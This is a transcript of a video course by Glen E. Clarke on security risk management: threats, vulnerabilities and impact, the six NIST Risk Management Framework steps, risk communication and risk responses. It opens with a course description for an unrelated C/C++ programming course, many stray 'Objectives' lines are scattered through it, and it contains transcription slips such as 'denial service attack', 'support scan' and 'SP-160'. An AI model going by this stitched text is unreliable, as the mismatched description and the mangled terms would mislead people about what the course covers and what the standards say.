Objectives
Objectives
Objectives
Objectives
In this course, you'll learn and construct the essential elements of C and C++ code and generate binary files
suitable for Linux and Windows operating systems. You'll work with variables and arrays in C/C++, and learn
how to use vectors and standard containers in C++. Next, you'll learn how to use C/C++ conditional statements
and loops, as well as how to perform string manipulation in both C and C++. Lastly, you'll learn how to define
and call C/C++ functions, and how to work with pointers in a C program."
Table of Contents
Objectives
Objectives
compile and run a Windows Portable Executable (PE) from C/C++ code
Objectives
Objectives
Objectives
Objectives
Objectives
Objectives
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years teaching organizations how to manage their
network environments and program applications with Microsoft technologies.
[Video description begins] Your host for the session is Glen E. Clarke. He is an IT Trainer and a
Consultant. [Video description ends]
I'm also an award nominated author who's authored the CompTIA Security Plus Certification study guide, the
CompTIA Network Plus Certification study guide, and the best-selling CompTIA Plus Certification All-in-
One for Dummies. My focus, over the last ten years, has been teaching Microsoft certified courses,
information security courses and networking courses such as ICND 1 and ICND 2.
On the journey from security analyst to security architect, understanding the importance of how to perform a
risk analysis is especially important from the viewpoint of a forensic analysis. In this course, I'll explore
security risk management concepts to better understand how to assess, categorize, monitor, and respond to
organizational-wide risk.
I'll describe risk as it relates to information systems and differentiate between threats, vulnerabilities, impact,
and risk. I'll also describe the steps to the NIST Risk Management Framework including categorizing risk,
selecting security controls, implementing security controls, assessing security controls effectiveness,
examining output of security controls assessment to determine whether or not the risk is acceptable.
And the last step of the Risk Management Framework, monitoring controls. I'll then discuss the benefits of a
control-focused risk management approach and an event-focused risk management approach and list essential
concepts to presenting risk to shareholders, such as soliciting shareholder input. Lastly, I'll differentiate
between different risk responses such as accepting, avoiding, mitigating, sharing, or transferring risk.
[Video description begins] Topic title: Understanding Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about risk as it relates to information systems. The range of devices that are
included in today's information systems include devices such as application specific servers, database servers,
mobile devices, and cloud resources. Today's information systems are complex in nature due to the different
components involved, their dependencies with one another and the communication channels between one
another.
There are a number of different threats against each component of the information system that can have
adverse effects on the organizational assets and operations, if exploited. This includes the risk of exploiting
known and unknown vulnerabilities to compromise the confidentiality, integrity, or availability of the
information being processed, stored, or transmitted by those systems.
The types of threats to organizations and their assets include purposeful attacks, such as the denial service
attack on the company website, environmental disruptions, such as a power outage, and human or machine
errors such as a system crashing. It is the job role of the information security professional and information
security managers to understand the security risk associated with each information system component that
supports the missions and the business functions of the organization.
There are a number of different types of risk for organizations. For example, organizations should be
concerned with risk against their investments, any legal liabilities the organization may have due to their
actions and the actions of their employees. Risk against the safety of the employees. Supply chain risk, which
is ensuring that the organization is able to receive the needed goods from suppliers.
The security risk related to information systems and physical security. And finally, program management risk.
The key point to remember here is that when you think of risk management, don't just consider risk to
information systems, remember there are other categories of risk management. Remember that risk
management is for all aspects of the organization and not just risk management of the information systems.
[Video description begins] Screen title: Risk Management. [Video description ends]
In today's complex environments, organizations have new state of the art information systems and are also
maintaining legacy information systems. And in most cases, having the new state of the art system
communicate with the legacy system to access the data that's housed on that system.
Effective risk management requires that organizations understand the full extent of their information systems
and components to fully understand the risk associated with those components and each of the business
functions. The risk of these systems being involved in a purposeful attack, environmental disruptions, or
human error, can cause the business mission or business as a whole to fail.
As security professionals responsible for risk management, it is important to develop the necessary and
sufficient risk response measures to adequately protect the company mission and business functions of the
organization.
In order to effectively manage information security risk across the organization, there are number of key
elements that must be followed. The first step is to assign risk management responsibilities to senior leaders
and executives within the organization. Next, it's important that senior leaders, and executives recognize and
understand the information security risk to the organization's operations and assets and its personnel.
You then must determine the organization's tolerance for risk. Ensure that this risk tolerance is communicated
throughout the organization and how understanding risk tolerance will aid in risk decision making. The final
key element is accountability by senior leaders and executives within the organization. They are ultimately
responsible for the risk management decisions and implementation of an effective organization-wide risk
management program. In this video, you learned about risk as it relates to information systems.
In this video, learn how to differentiate between threats, vulnerabilities, impacts, and risks.
Objectives
[Video description begins] Topic title: Risk Management Concepts. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about risk management concepts and the difference between threats,
vulnerabilities, impacts, and risk. When performing risk assessment, your decisions are driven by risk
concepts, such as the threats, vulnerabilities, impacts, and the risk. Let's take a look at each of these terms.
Threats are events that can have a negative impact on a company asset.
For example, a company website has the potential threat of a denial service attack occurring against the
website. These threads can be man made threats, such as a virus, or natural occurrences, such as a fire or
flooding. When talking about risk and risk management, you will hear the term vulnerability quite often.
A vulnerability is a weakness in a product, a system, or information that allows the threat to be possible. For
example, a vulnerability could be that the web server processes malicious HTTP requests, which makes it
vulnerable to folder traversal attacks. The next risk term to be familiar with is impact.
When assessing risk, we evaluate the weaknesses and the threats against those weaknesses. But we also
evaluate the impact that a threat will have if successful in exploiting the vulnerability. For example, you have
an e-commerce website that is vulnerable to a denial service attack.
It might have an impact of loss of revenue for the time that the website is down. When assessing risk, you
would calculate that loss of impact, which would identify the impact for the threat.
[Video description begins] The following point appears on the screen: The extent that changes to an
information system could affect the security state of the system. [Video description ends]
When we put this all together, we can calculate the risk of an event. The risk is the chance that a specific threat
exploits a specific vulnerability to cause a negative effect to a system or its information. In this video, you
learned about risk management concepts and the difference between threats, vulnerabilities, impacts, and risk.
Upon completion of this video, you will be able to describe the first step of the NIST risk management
framework, which is categorizing risk.
Objectives
describe the first step of the NIST risk management framework, categorizing risk
[Video description begins] Topic title: Categorizing Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video we look at the first step of the NIST Risk Management Framework, which is categorizing risk.
There are six main steps to the NIST Risk Management Framework. Plus a prepare step, which involves
assigning risk roles to individuals within the company and determining the risk tolerance for the organization.
Once the prepare stage or step is complete, then you move on to the categorizing risk. With the categorizing
risk you identify the systems and information, and describe and document those systems.
The goal of this phase is to identify how critical a system and its information is to the organization from a
worst-case scenario point of view. And the impact to the organization or business functions if the asset is lost.
When determining the criticality of a system, the system owner evaluates the impact of loss on the three
security objectives of confidentiality, integrity and availability. For example, the system owner may determine
that if a system has a security compromise affecting availability, it is considered low impact to that system.
Yet a security compromise affecting the confidentiality of the system maybe is considered a high impact to the
system. When the system owner is determining the impact of loss to the three security objectives, they
typically go with one of the following ratings. First we have a low rating, meaning the loss has very little
impact to the security objective. We have moderate as a rating, which means the loss has serious impact to the
security objective.
And then finally we have a high rating, which means that the loss has catastrophic impact to the security
objective. The values used to assign impact levels to the loss of the security objective helps the organization
determine the security controls to put in place to help protect the asset. For example, if availability impact level
is low but confidentiality is high for an asset, the organization will invest in encryption solutions over high-
availability solutions for that asset. In this video, you learned about categorizing risk.
Upon completion of this video, you will be able to describe the second step in the RMF, which is selecting
security controls.
Objectives
[Video description begins] Topic title: Selecting Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video you'll learn about the second step of the risk management framework, selecting the security
controls. Once you finalize the categorizing phase, you can then move on to the select phase, whose focus is to
determine the security controls that are needed to protect an asset and its information. Not only are you to
select the security control, but you define the appropriate baseline configuration for that security control and
any tailored guidance or customization recommendations that could be made.
The Federal Information Processing Standard, or FIPS for short, has a standard 200 that defines 17 security
areas that help address a balanced security program. This standard includes management, operational, and
technical security controls. The standard also works closely with NIST Special Publication 800-53 and
describes the need for a minimum baseline of security controls and that the controls are to be tailored
appropriately for the environment that they are used in. Security controls are components put in place to
protect the confidentiality, integrity, and availability of our systems and information.
For example, a firewall and a RAID array are examples of security controls. When choosing security controls,
you have security control baselines, which is a selection of controls based on the family of the control and the
impact level you wish to reach. Example of control families are access control and audit and accountability
whereas, examples of impact levels are things like low, moderate, and high. Low meaning the loss has very
little impact to the security objective. Moderate meaning the loss has serious impact to the security objective.
And high meaning the loss has catastrophic impact to the security objective. The implementation of the
security controls may need to change depending on the environment they're placed in. For example, the
implementation is different for cloud resources versus a mobile device versus a control implemented in an
application. You will need to tailor the control to fit the scenario. The security control baselines are determined
by a number of components such as the security category for the asset the control is guarding.
For example, is the security control guarding data or information or is it designed to guard a system? The
security control baseline is also determined by the risk associated with that asset. The risk level comes from
risk assessments but also the organization's tolerance to risk. The baselines are a starting point for the security
controls and should be tailored. These should be tailored to fit the mission of the company and the environment
of the system or information that the control is sitting in.
It should be noted that some controls are not included in the baselines. There are a number of control families
listed in the control catalog found in Appendix F of Special Publication 800-53. Some examples of control
families are security controls that deal with access control get a code of AC, configuration management
controls get a code of CM. Incident response controls get a code of IR.
Planning controls get a code of PL, and personnel security controls get a code of PS. As an example, Appendix
F of NIST Special Publication 800-53 lists different controls for different families. When looking at the
document, you will see a scenario called AC-2, Account Management. So this is access control that deals with
account management. When you read the recommendation on this scenario, they give recommendations for
controls needed to have temporary accounts automatically removed after they expire. In this video, you learned
about selecting the security controls.
Upon completion of this video, you will be able to describe the third step in the Risk Management Framework,
implementing security controls.
Objectives
[Video description begins] Topic title: Implementing Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about implementing security controls. Step three the risk management framework
is to implement the security controls that were selected during the select stage. When implementing the
security controls. You should follow sound system engineering practices to ensure that the controls are
implemented in a secure manner. When applying the security configuration settings to the control. Be sure to
implement the control following the best practices supplied in the NIST Special Publication 800-160.
This publication not only discusses best practices for security configuration, but also stresses validation of the
configuration. When implementing the security controls, there are a number of best practices that should be
followed. First, review the plan for implementing the control on the system. And address any assurance
requirements the organization may have for implementing controls. Assurance requirements are designed for
developers and implementers to test and prove the controls are implemented correctly.
Planning for security controls should be part of the development phase in the system development lifecycle.
Next, be sure to review publications and documentation on the correct implementation of the security control.
For example, NIST Special Publication 800-53 specifically addresses security and privacy controls. While
NIST Special Publication SP-160 covers secure design engineering. The final best practice is to ensure that
implementers are properly trained on the products and technologies they are implementing.
The implementation of the security controls involved many tasks. And may include writing and following
organization policies, plans and operational procedures. Applying configuration settings to both the operating
system and the applications of the system. The goal is to ensure the system is in a secure state, and that means
focusing on all aspects of the system, not just the operating system. And then finally, you may want to install
tools or software that helps you automate the implementation of the control. This could be something as simple
as a few scripts to automate or an enterprise application that helps automate the configuration. In this video,
you learned about implementing security controls.
Upon completion of this video, you will be able to describe the fourth step in the RMF, assessing security
control effectiveness.
Objectives
[Video description begins] Topic title: Assessing Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about assessing security control effectiveness. After the implementation of the
security controls, it's imperative to move into the assess phase where you validate the implementation. When
validating the implementation of the security controls you want to answer these three questions. Are the
controls implemented correctly? Meaning based on industry best practices has the control been configured
correctly? Are the controls operating as intended? After verifying the configuration you want to test the
control.
For example, if the control is a firewall, you would validate that only the trusted packets are allowed to pass
through the firewall. The final question is, are the controls meeting the security requirements? This involves
looking back at the requirements for the control and verify its doing what was required. NIST Special
Publication 800-53A is a supplemental document that discusses the steps to assess the implementation. First,
you want to develop the security assessment plan.
And in that plan determine which controls are to be assessed, determine the appropriate procedures to assess
those controls, and determine the depth and coverage needed for assurance. The next step to assessment is to
actually perform the assessment of the security controls based on the security assessment plan. Then, you want
to analyze the results of the assessment to determine if the goals of the security controls have been met.
And finally, create a security assessment report to communicate the results of the assessment. There are three
core assessment methods that work with different types of objects while assessing the implementation. First,
we have the interview method, which involves discussing the implementation with individuals or groups of
individuals. Then, we have the examine method which involves the assessors examining the specifications,
such as policies, procedures, and designs.
It also involves examining the functionality of hardware, software, and firmware on the systems. Finally, this
method also involves examining activities such as system operations, administration, and management
activities. Finally, we have the test method, which runs test on mechanisms such as the functionality of
hardware, software, and firmware. This method also involves testing activities such as system operations,
administration, and management activities. In this video, you learned about assessing security control
effectiveness.
After completing this video, you will be able to describe the fifth step in the RMF, which is examining the
output of security controls assessment to determine whether or not the risk is acceptable.
Objectives
describe the fifth step in the RMF, examining output of security controls assessment to determine
whether or not the risk is acceptable
[Video description begins] Topic title: Examining Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about the fifth phase of the risk management framework which is authorize. The
authorize phase of the risk management framework involves examining the output of the security control's
assessment performed in the previous stage to determine whether or not the residual risk is acceptable to your
organization. Residual risk is the risk that remains after the implementation of the security controls. The output
in this case that is reviewed would be the security assessment report from the assess phase of the risk
management framework.
The person responsible for the authorization is known as the authorizing official who examines the output of
the security control assessment and determines whether or not the residual risk after the controls have been
implemented is acceptable. The authorizing official may consult with a number of other individuals within the
organization in order to make the authorization decision. The authorizing official may consult with the risk
executive the chief information officer for the organization, or the chief information security officer to ensure
that as a collective everyone agrees that the residual risk is acceptable. In this video, you learned about the
authorize phase of the risk management framework.
After completing this video, you will be able to describe the last step in the RMF, monitoring.
Objectives
[Video description begins] Topic title: Monitoring Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about Step 6 of the risk management framework known as the monitor phase. In
the monitor phase, you're responsible for the continuous monitoring of controls that were implemented.
Continuous monitoring involves monitoring the operating environment for any changes to that environment
because any changes to the environment could affect the controls effectiveness.
Continuous monitoring also involves monitoring for activity that could be considered a sign of an attack as you
want to ensure that the control is being effective and protecting the asset during the attack. There are different
types of monitoring that should be incorporated in the organization wide monitoring program. You should look
to implement risk monitoring and reassess if residual risk is acceptable.
You can use the guidance supplied in the NIST Special Publication 800-39. Monitor for configuration changes
and the management of those changes as changes to the environment could cause the control to be ineffective.
Look to guidance supplied in the NIST Special Publication 800-128.
And finally, always monitor the effectiveness of the control to ensure it is giving the protection that it needed.
NIST Special Publication document 800-137 gives recommendations for control effectiveness monitoring. In
this video, you learned about Step 6 of the risk management framework, the monitor phase.
Upon completion of this video, you will be able to recognize the benefits of a risk management approach that
focuses on control.
Objectives
[Video description begins] Topic title: Control Focused Risk Management. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about control focused risk management. When performing a risk assessment, you
typically follow the following steps. First, you identify the assets within the organization. You then determine
the threats against each of those assets. Then you determine the impact that each threat would have against
those assets. And finally, you determine the likelihood of that threat occurring. For example, you may have a
business location that operates in an area that has the potential for earthquakes.
The threat of the earthquake would have high impact and cost the business hundreds of thousands of dollars, if
not millions. But you may not be overly concerned about this threat because the likelihood of it occurring is
almost nil. With a control-based risk assessment, you focus on identifying ways to control the risk and always
come up with alternate risk controls as a company, so that you can evaluate the different risk controls, and
determine the best control to mitigate the risk. Many times, there may be multiple controls that are
implemented in order to reduce risk. In this video, you learned about control based risk assessment.
[Video description begins] Topic title: Event Focused Risk Management. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about the benefits of event-based risk management. There are a number of
different types of security events that can occur in environments today. There are system security events which
are security incidents that occur on a single system. There are service level security events associated with a
specific service, such as an email service or a database service.
And there are network level security events which are security events that occur on the network, such as
support scan across the network, or at the capturing of network traffic. When analyzing security events, you
are looking to identify an occurrence of possible security breach against the information security policy, or one
of the security controls involving a system, a service, or the network.
These security events can be events you can identify for certain as a security incident, or events that you are
uncertain of but must still investigate. With event-focused risk management, you focus on the critical events
and identify the risk associated with those critical events. In this video, you learned about event-focused risk
management.
Upon completion of this video, you will be able to list keys to presenting risk to shareholders, such as
soliciting stakeholder input.
Objectives
[Video description begins] Topic title: Risk Communication. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about presenting risk to stakeholders. Risk communication is an integral part of the
risk assessment process and typically includes communicating with company stakeholders and the parties that
own assets which are potentially at risk. It is important to note that risk communication is an iterative process
that involves communicating with stakeholders during each phase of the risk assessment.
The goal of risk communication is to ensure that the stakeholders have an understanding of the risk assessment
processes and assumptions being made while the risk assessment is being performed. It has been proven that
early involvement in continuous communication with the stakeholders improves the quality of the risk
assessment. Experience has shown that decisions made during a risk assessment in collaboration with the
stakeholders is more durable and effective.
There are three key characteristics to stakeholder input that drives the success of the risk assessment. First,
getting input from the stakeholders should be an iterative process and happen at every phase of the risk
management process. Second, you want to get input from the stakeholders as early as possible in the risk
assessment process from the scoping phase to the implementation of recommendations to reducing risk.
Finally, getting input from the stakeholders during each phase of the risk assessment is going to improve the
quality of the assessment and the decisions made because of the assessment. One of the challenges with risk
assessments is risk perspective and perception. Stakeholders often have different perspectives on the findings
of the risk assessment and the appropriate mitigation actions that need to be taken.
The challenges that these different perspectives create different perception on the magnitude of the risk and
priorities of the risk. For example, when dealing with hazardous materials an odor may have the perception of
not presenting any direct risk. But for others failure to address the odor may raise concerns on the credibility of
the cleanup process that occurred. One of the other challenges with risk communication is how to effectively
present risks strategies.
When communicating risks to your audience you must first find a way to present the facts to both a technical
and non-technical audience, and be sure to convey the following. The context, objective and the scope of the
risk assessment, as well as educating your audience on assumptions made, methods used, and the endpoint for
the risk assessment. In this video, you learned about risk communication.
Find out how to differentiate between different risk responses such as accepting, avoiding, mitigating, sharing,
or transferring risk.
Objectives
differentiate between different risk responses such as accepting, avoiding, mitigating, sharing, or
transferring risk
[Video description begins] Topic title: Risk Response and Remediation. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn how to respond to risk. When performing your risk assessment you will eventually
be deciding on how to respond to risk. This phase is divided into multiple sub-phases because you will need to
first identify the different courses of action you should use to respond to risk. Then you evaluate each of those
courses of action. Then you decide on the best course of action to take. And finally, you implement the course
of action.
You identify and evaluate multiple courses of action because you need to assess the impact each course of
action will have on the business missions and functions. When identifying and evaluating the different courses
of action you want to understand the different types of information you use as input to make decisions. Factors
that affect your decision, or the identification of potential threats that could exist, and the vulnerabilities
associated with the asset.
You also want to consider the potential consequences, or impact of implementing a risk response measure. The
risk response measure is the action you take to respond to the risk being identified and evaluated. Finally, you
want to include as input any potential risk that may exist to the company or organization assets. The operations
and functions of the business or organization, the individuals within the organization, and any other
organizations that may have relations with the organization being assessed.
When performing your risk assessment you are responsible for identifying the appropriate risk response to
each of the risks. There are a number of different types of potential responses. The first potential risk response
is risk acceptance. You would choose risk acceptance if the level of risk was within the organization's
tolerance to risk. For example, a company with a data center located in an area that have earthquakes may
accept the risk due to the fact that the likelihood of an earthquake occurring is very low.
There is risk avoidance. Risk avoidance means that the company would no longer perform the activities that
are associated with the risk in order to avoid the risk. For example, a company that is planning to connect two
networks together may determine that the cost of implementing controls to reduce the risk associated with the
network connection are too high. So they avoid the risk by deciding not to connect the two networks together.
You have risk mitigation which is the most common action and involves implementing security controls to
reduce the level of risk to an organization's tolerance level. For example, implementing a firewall to protect the
e-commerce site, will mitigate risk to the e-commerce site. And finally, you have risk sharing, which is also
known as transferring risk. When transferring risk, you're removing the risk liability and responsibility to
another organization. An example of transferring risk would be to get an insurance policy on a facility in case
it's damaged in a natural disaster.
After identifying the risk associated with each of the assets, and then identifying the different risk responses,
you'll need to evaluate the alternative courses of action to respond to risk. When evaluating the alternative
courses of action, you should determine how you will measure the effectiveness of the course of action, and
how feasible it is to implement the course of action. While evaluating the alternate courses of action, be sure to
determine the cost of the implementation throughout the life cycle of the solution, and not just the initial cost.
After evaluating the alternate courses of action the next step is to decide on the course of action you wish to
take. Deciding on the most appropriate course of action involves prioritizing responses. For example, some
risks are greater than others, so you may invest in mitigation of some risks while accepting or transferring
other risks. Sometimes, your risk response may require additional resources as is the case with high priority
risk items over low priority risk item.
There is typically residual risk involved after taking risk action, so you'll need to address the residual risk, and
determine how to handle that residual risk. Other factors that affect the decision process are more intangible
items such as risk tolerance of an organization, trust, and culture of the organization can effect the decision
making process.
The final step is to implement the selected course of action which can be challenging depending on the size of
the organization and the complexity of the solution. The risk response measure that is taken may vary in time
to implement. For example, a risk response measure may be tactical, such as deploying patches to remove
identified vulnerabilities from a system. This is typically a quick implementation while other solutions are a bit
more strategic, such as the implementation of an alternate site in case of a natural disaster. In this video, you
learned how to respond to risk.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the security risk management framework, and how it can be used to respond
to organizational wide risk.
[Video description begins] Risk Management Framework is abbreviated as RMF. [Video description ends]
We did this by exploring how to assess, categorize, monitor, and respond to risk. How to select, implement,
and assess security controls. How to examine risk acceptability and monitor controls. Control and event risk
management. And risk communication, response and remediation. In our next course, we'll move on to explore
software security with an emphasis on techniques used to perform software assessments and testing.